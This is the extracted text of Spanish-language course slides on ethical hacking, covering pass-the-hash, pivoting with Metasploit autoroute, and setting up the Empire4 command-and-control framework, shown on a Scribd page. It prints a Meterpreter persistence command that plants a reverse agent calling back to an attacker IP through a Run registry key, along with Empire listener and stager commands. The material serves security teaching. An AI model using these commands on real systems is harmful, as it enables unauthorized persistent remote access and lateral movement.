0% found this document useful (0 votes)

41 views23 pages

Ethical Hacking & Malware Analysis

Tema 09 hacking etico

Uploaded by

Daya Ochoa

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

41 views23 pages

Ethical Hacking & Malware Analysis

Tema 09 hacking etico

Uploaded by

Daya Ochoa

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 23

HEAMALW

Daniel Martínez

Pass the hash, Pivoting e intro a EMPIRE4

REPASO
Agenda:

Tipos de explotación
Directa
Client-Side
Explotación local

Hacking Ético y Análisis de Malware– Daniel Martínez

REPASO
Bypass UAC

Hacking Ético y Análisis de Malware– Daniel Martínez

REPASO
Bypass UAC

Hacking Ético y Análisis de Malware– Daniel Martínez

Persistencia
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.71
[*] Creating a persistent agent: LHOST=192.168.1.71 LPORT=443
(interval=5 onboot=true)
[*] Persistent agent script is 613976 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\yyPSPPEn.vbs
[*] Agent executed with PID 492
[*] Installing into autorun as
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] Installed into autorun as
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] For cleanup use command: run multi_console_command -rc
/root/.msf4/logs/persistence/XEN-XP-SP2-
BARE_20100821.2602/clean_up__20100821.2602.rc
meterpreter >

Hacking Ético y Análisis de Malware– Daniel Martínez

PASS THE HASH
Pass the hash

Hacking Ético y Análisis de Malware– Daniel Martínez

PASS THE HASH
Pass the hash

Hacking Ético y Análisis de Malware– Daniel Martínez

PASS THE HASH
Pass the hash

Hacking Ético y Análisis de Malware– Daniel Martínez

PASS THE HASH
Pass the hash
CON UAC ACTIVO:

Hacking Ético y Análisis de Malware– Daniel Martínez

PASS THE HASH
Pass the hash
SIN UAC ACTIVO:

Hacking Ético y Análisis de Malware– Daniel Martínez

PASS THE HASH
Mimikatz

Hacking Ético y Análisis de Malware– Daniel Martínez

PASS THE HASH
▪ Cracking de contraseñas

▪ Otros movimientos laterales

Hacking Ético y Análisis de Malware– Daniel Martínez

PIVOTING

▪ Proxies y sockets

▪ Enrutamiento

Hacking Ético y Análisis de Malware– Daniel Martínez

PIVOTING
msf6 post(windows/gather/arp_scanner) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > options
Module options (post/multi/manage/autoroute):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD autoadd yes Specify the autoroute command
(Accepted: add, autoadd, print, delete, default)
NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or
CIDR as "/24"
SESSION yes The session to run this module on.
SUBNET no Subnet (IPv4, for example,
10.10.10.0)
msf6 post(multi/manage/autoroute) > set session 2
session => 2
msf6 post(multi/manage/autoroute) > set subnet 192.168.56.0/24
subnet => 192.168.56.0/24
msf6 post(multi/manage/autoroute) > run
[!] SESSION may not be compatible with this module.
[*] Running module against DESKTOP-SNNS88V
[*] Searching for subnets to autoroute.
[*] Did not find any new subnets to add.
[*] Post module execution completed

Hacking Ético y Análisis de Malware– Daniel Martínez

HERRAMIENTAS

▪ EMPIRE4

• Servidor
Actúa principalmente como centro de mando y control

• Cliente
Permite al operador gestionar el servidor para crear
payloads

Hacking Ético y Análisis de Malware– Daniel Martínez

HERRAMIENTAS

$ python3 empire.py server -h

usage: empire.py server [-h] [--debug [DEBUG]] [--reset] [-v] [-
-config CONFIG] [--restip RESTIP] [--restport RESTPORT] [--
socketport SOCKETPORT] [--username USERNAME] [--password
PASSWORD]

...

General Options:
--debug [DEBUG] Debug level for output ...
--reset Resets Empire's database to defaults.
-v, --version Display current Empire version.
--config CONFIG Specify a config.yaml different from the
config.yaml in the empire/server directory.

...

Hacking Ético y Análisis de Malware– Daniel Martínez

HERRAMIENTAS

Hacking Ético y Análisis de Malware– Daniel Martínez

HERRAMIENTAS

EMPIRE4

▪ Listener
Subsistema de comunicación entre la máquina víctima y el
servidor.

▪ Stager
Componente de carga del resto de artefactos de control en la
máquina víctima.

▪ Agent
Será el programa que se instalará finalmente en el equipo
víctima y permitirá administrarlo de forma remota.

Hacking Ético y Análisis de Malware– Daniel Martínez

HERRAMIENTAS

EMPIRE4 (EJEMPLO)

1. Creación del LISTENER

uselistener http
set Name mylistener
set BindIP <IP>
set Port <PORT>
Execute

2. Creación del STAGER

usestager multi/pyinstaller
set Listener mylistener
Execute

Hacking Ético y Análisis de Malware– Daniel Martínez

HERRAMIENTAS
EMPIRE4 (EJEMPLO)

3. Ejecución del stager en el cliente

Hacking Ético y Análisis de Malware– Daniel Martínez

HERRAMIENTAS
EMPIRE4 (EJEMPLO)

Hacking Ético y Análisis de Malware– Daniel Martínez

HERRAMIENTAS
EMPIRE4 (EJEMPLO)

Hacking Ético y Análisis de Malware– Daniel Martínez

www.unir.net
Hacking Ético y Análisis de Malware– Daniel Martínez

Road To OSCP V0.7
No ratings yet
Road To OSCP V0.7
41 pages
Brian
No ratings yet
Brian
2 pages
Vulnerabilidades SMB e Icecast Detectadas
No ratings yet
Vulnerabilidades SMB e Icecast Detectadas
8 pages
Lab Met As Ploit
No ratings yet
Lab Met As Ploit
6 pages
Pentesting Cheatsheet
No ratings yet
Pentesting Cheatsheet
51 pages
Cheatsheet Metasploit&Meterpreter
No ratings yet
Cheatsheet Metasploit&Meterpreter
8 pages
Damn Vulnerable Web App (DVWA) - Lesson 4 - Using Metasploit With Command Execution
No ratings yet
Damn Vulnerable Web App (DVWA) - Lesson 4 - Using Metasploit With Command Execution
31 pages
DoLAB - Ice TryHackMe Walkthrough
No ratings yet
DoLAB - Ice TryHackMe Walkthrough
7 pages
Host Pentes
No ratings yet
Host Pentes
4 pages
Hack Win XP With MSF
No ratings yet
Hack Win XP With MSF
10 pages
Cybersecurity Protocol Exploitation Guide
No ratings yet
Cybersecurity Protocol Exploitation Guide
43 pages
Ethical Hacking
No ratings yet
Ethical Hacking
10 pages
Hacking Tools Cheat Sheet
100% (14)
Hacking Tools Cheat Sheet
2 pages
Hack Academy's Metasploit Cheat Sheet ?
No ratings yet
Hack Academy's Metasploit Cheat Sheet ?
7 pages
MAA WP 10gR2 RecoveryBestPractices
No ratings yet
MAA WP 10gR2 RecoveryBestPractices
35 pages
Metasploit Command Cheat Sheet
No ratings yet
Metasploit Command Cheat Sheet
8 pages
CTF Series - Vulnerable Machines
100% (1)
CTF Series - Vulnerable Machines
153 pages
Hackercool Magazine - November 2023 Compressed
No ratings yet
Hackercool Magazine - November 2023 Compressed
53 pages
Message
No ratings yet
Message
76 pages
Metasploit Cheat Sheet
100% (1)
Metasploit Cheat Sheet
2 pages
1.-Asegurarnos de Tener Una Configuración de Red Estática:: Cat /etc/sysconfig/network-Scripts/ifcfg-Enp0s3
No ratings yet
1.-Asegurarnos de Tener Una Configuración de Red Estática:: Cat /etc/sysconfig/network-Scripts/ifcfg-Enp0s3
18 pages
Pentesting With Metasploit
100% (3)
Pentesting With Metasploit
43 pages
Pertemuan 7 Kelas Pentest - Metasploit - Final
No ratings yet
Pertemuan 7 Kelas Pentest - Metasploit - Final
89 pages
ms03 049 Netapi
No ratings yet
ms03 049 Netapi
37 pages
Empire 1.5
No ratings yet
Empire 1.5
6 pages
Network Security Audit
0% (2)
Network Security Audit
17 pages
Penetration Testing Guide
No ratings yet
Penetration Testing Guide
16 pages
Pivoting Into A Network Using PLINK and FPipe
No ratings yet
Pivoting Into A Network Using PLINK and FPipe
5 pages
Cybersecurity Exploit Tutorials
No ratings yet
Cybersecurity Exploit Tutorials
4 pages
Penetration Testing Tools Cheat Sheet
100% (1)
Penetration Testing Tools Cheat Sheet
35 pages
Advanced Network Scripting Guide
No ratings yet
Advanced Network Scripting Guide
197 pages
OSCP Survival Guide
No ratings yet
OSCP Survival Guide
48 pages
Cheat Sheet Imperva
100% (2)
Cheat Sheet Imperva
12 pages
Check Point Firewalls
No ratings yet
Check Point Firewalls
66 pages
Pentest Cheat Sheet
No ratings yet
Pentest Cheat Sheet
26 pages
Firewall Troubleshooting Commands
No ratings yet
Firewall Troubleshooting Commands
9 pages
Inside The Mind of Network Hacker
No ratings yet
Inside The Mind of Network Hacker
28 pages
Using The Metasploit Framework
No ratings yet
Using The Metasploit Framework
19 pages
Cheat Cheet Pentest
No ratings yet
Cheat Cheet Pentest
34 pages
EJPTv2 Examen Cheatsheet - Pdf.es - en
100% (1)
EJPTv2 Examen Cheatsheet - Pdf.es - en
29 pages
Pandora
No ratings yet
Pandora
21 pages
Network Scanning & Security Tools
No ratings yet
Network Scanning & Security Tools
5 pages
Metasploit Cheat Sheet for Hackers
No ratings yet
Metasploit Cheat Sheet for Hackers
2 pages
f5 Agility Labs Waf PDF
100% (2)
f5 Agility Labs Waf PDF
344 pages
Meterpreter CS
No ratings yet
Meterpreter CS
3 pages
vm0300 Doc1
No ratings yet
vm0300 Doc1
157 pages
Các lệnh cơ bản dùng trong BackTrack
No ratings yet
Các lệnh cơ bản dùng trong BackTrack
24 pages
Analytics
No ratings yet
Analytics
9 pages
PowerShell Lab: Commands & Automation
No ratings yet
PowerShell Lab: Commands & Automation
10 pages
Scan Results Trave8hm 20250129 Scan 1738124750 14870
No ratings yet
Scan Results Trave8hm 20250129 Scan 1738124750 14870
68 pages
© 2018 Caendra Inc. - Hera For Ptpv5 - Leveraging Powershell During Exploitation
No ratings yet
© 2018 Caendra Inc. - Hera For Ptpv5 - Leveraging Powershell During Exploitation
26 pages
Rhel Notes For Rh253
100% (1)
Rhel Notes For Rh253
27 pages
Metasploit Framework Mastery
No ratings yet
Metasploit Framework Mastery
34 pages
Lateral Movement - WinRM
No ratings yet
Lateral Movement - WinRM
21 pages
Metasploitable 2 CTF Walkthrogh
No ratings yet
Metasploitable 2 CTF Walkthrogh
27 pages
Metasploitable 2 Vulnerability Guide
No ratings yet
Metasploitable 2 Vulnerability Guide
12 pages
VTP and DTP
No ratings yet
VTP and DTP
17 pages
Subnetting Cheat Sheet PDF
No ratings yet
Subnetting Cheat Sheet PDF
2 pages
Meraki SD Wan
No ratings yet
Meraki SD Wan
35 pages
Lecture 13 - BGP Part 3
No ratings yet
Lecture 13 - BGP Part 3
27 pages
Cisco SD-WAN Direct Internet Access Guide
No ratings yet
Cisco SD-WAN Direct Internet Access Guide
8 pages
VPN: Virtual Private Network: Presented by
No ratings yet
VPN: Virtual Private Network: Presented by
27 pages
CentOS Postfix Dovecot Ipv4
No ratings yet
CentOS Postfix Dovecot Ipv4
9 pages
Advanced Broadband & WAN Tech
No ratings yet
Advanced Broadband & WAN Tech
64 pages
STM-16 SDH Multiplexer Platform
0% (1)
STM-16 SDH Multiplexer Platform
2 pages
Snort Rules for Network Security
No ratings yet
Snort Rules for Network Security
43 pages
DEVASC Module 4
No ratings yet
DEVASC Module 4
69 pages
CCNA Exploration - Network Fundamentals - 3 Application Layer Functionality and Protocols
No ratings yet
CCNA Exploration - Network Fundamentals - 3 Application Layer Functionality and Protocols
26 pages
Mikrotik HAP AC
No ratings yet
Mikrotik HAP AC
106 pages
GV55 Quick Start
No ratings yet
GV55 Quick Start
2 pages
Schneider Electric Modicon-Networking MCSESR043F2LM0
No ratings yet
Schneider Electric Modicon-Networking MCSESR043F2LM0
9 pages
Mapping Course Content To CompTIA Network+ (Exam N10-008)
No ratings yet
Mapping Course Content To CompTIA Network+ (Exam N10-008)
21 pages
NT1330 Week 3, Unit 3 Exercise 3
No ratings yet
NT1330 Week 3, Unit 3 Exercise 3
2 pages
77-006063 Landslide 24.3 Release Notes RevA
No ratings yet
77-006063 Landslide 24.3 Release Notes RevA
31 pages
WPC Practical No. 25
No ratings yet
WPC Practical No. 25
3 pages
Chapter6 - DNS
No ratings yet
Chapter6 - DNS
11 pages
PLI xPON 2023.q1.v1.4.pub
No ratings yet
PLI xPON 2023.q1.v1.4.pub
31 pages
Bandwidth vs. Throughput Explained
No ratings yet
Bandwidth vs. Throughput Explained
12 pages
CCNA Simulations Updated 14-Feb-23
No ratings yet
CCNA Simulations Updated 14-Feb-23
54 pages
KX-NS500 Remote IP Extensions
No ratings yet
KX-NS500 Remote IP Extensions
29 pages
FortiGate 7.4 Administrator Study Guide-Online v2 Español
No ratings yet
FortiGate 7.4 Administrator Study Guide-Online v2 Español
818 pages
PBR Support For Multiple Tracking Options
100% (1)
PBR Support For Multiple Tracking Options
8 pages
Advanced Computer Networks Test Questions
No ratings yet
Advanced Computer Networks Test Questions
4 pages
PfSense FW-7551 Quick Start Guide 7-18-14
No ratings yet
PfSense FW-7551 Quick Start Guide 7-18-14
15 pages
HP HPE7-A01 v2024-11-15 q128
No ratings yet
HP HPE7-A01 v2024-11-15 q128
69 pages
OScam Cache-EX Mode 3 Tutorial
No ratings yet
OScam Cache-EX Mode 3 Tutorial
4 pages

Ethical Hacking & Malware Analysis

Uploaded by

Ethical Hacking & Malware Analysis

Uploaded by

HEAMALW

Pass the hash, Pivoting e intro a EMPIRE4

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

▪ Otros movimientos laterales

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

$ python3 empire.py server -h

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

1. Creación del LISTENER

2. Creación del STAGER

Hacking Ético y Análisis de Malware– Daniel Martínez

3. Ejecución del stager en el cliente

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

Hacking Ético y Análisis de Malware– Daniel Martínez

You might also like